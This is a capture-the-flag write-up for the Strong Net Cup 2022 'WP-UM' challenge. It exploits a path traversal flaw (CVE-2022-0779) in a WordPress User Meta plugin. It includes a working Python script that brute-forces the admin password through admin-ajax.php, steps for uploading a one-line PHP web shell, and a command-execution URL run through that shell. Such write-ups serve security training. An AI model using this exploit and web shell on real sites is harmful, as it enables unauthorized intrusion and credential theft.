当前位置:网站首页>[Strong Net Cup 2022] WP-UM
[Strong Net Cup 2022] WP-UM
2022-08-05 10:03:00 【Landasika】
Test site: WordPress User Meta Lite Pro 2.4.3 Path Traversal Vulnerability CVE-2022-0779
Initialize questions first
Get administrator account password
Register a user
Login user
Capture the uploaded data package
Then send, intercept a packet with action=um_show_uploaded_file
According to the home page information, you can get the administrator's username
Using the CVE-2022-0779 Path traversal vulnerability, if this file exists, then Remove will be displayed, if there is no such file, there will be no Remove
Blast the password
import requestslis='qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'password=''url="http://ip:port/wp-admin/admin-ajax.php"header={'Host': 'ip:port','X-Requested-With': 'XMLHttpRequest','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36','Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','Origin': 'http://ip:port','Referer': 'http://ip:port/index.php/upload/','Cookie':'wordpress_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C773b42bf40849a9d6365ec60b43eb256204f1c41a3c52103702ac0ea8b910a85; wordpress_logged_in_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C46c1c28f20badcb553d1aef7f4ee2f926b5a6b9cb83e0f934a230f38d30a88cc'}for i in range (1,16):for s in lis:datas="field_name=upload&filepath=/../../../../../../../password/"+str(i)+s+"&field_id=um_field_2&form_key=upload&action=um_show_uploaded_file&pf_nonce=8a8f9c780f&is_ajax=true"result=requests.post(url,data=datas,headers=header)if 'Remove' in result.text:password+=sbreakprint(password)
Upload a Trojan horse
Modify upload file settings
Then enter the page to update
Upload a sentence Trojan
Get flag
Go to wp-content/uploads/file/2.php
wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);
oads/file/2.php
wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);
边栏推荐
猜你喜欢
Oracle temporary table space role
hcip BGP enhancement experiment
【AGC】增长服务1-远程配置示例
百年北欧奢华家电品牌ASKO智能三温区酒柜臻献七夕,共品珍馐爱意
Marketing Suggestions | You have an August marketing calendar to check! Suggest a collection!
偏向锁/轻量锁/重级锁锁锁更健康,上锁解锁到底是怎么完成实现的
How can project cost control help project success?
Tanabata romantic date without overtime, RPA robot helps you get the job done
19. Server-side session technology Session
2022.8.3
随机推荐
无题十四
MySQL使用聚合函数可以不搭配GROUP BY分组吗?
Redis源码解析:Redis Cluster
[强网杯2022]WP-UM
2022-08-01 Review the basic binary tree and operations
Oracle temporary table space role
How ali cloud storage database automatically to speed up the loading speed of www.cxsdkt.cn how to set up the case?
Qiu Jun, CEO of Eggplant Technology: Focus on users and make products that users really need
创建一个 Dapp,为什么要选择波卡?
What is the function of the regular expression replaceAll() method?
浅析WSGI协议
2022华数杯数学建模思路分析交流
欧盟 | 地平线 2020 ENSEMBLE:D2.13 SOTIF Safety Concept(下)
企业的数字化转型到底是否可以买来?
ffmpeg drawtext add text watermark
The Seven Weapons of Programmers
Science bosses say | Hong Kong rhubarb KaiBin teacher take you unlock the relationship between the matrix and 6 g
leetcode: 529. Minesweeper Game
Oracle临时表空间作用
First Decentralized Heist?Loss of nearly 200 million US dollars: analysis of the attack on the cross-chain bridge Nomad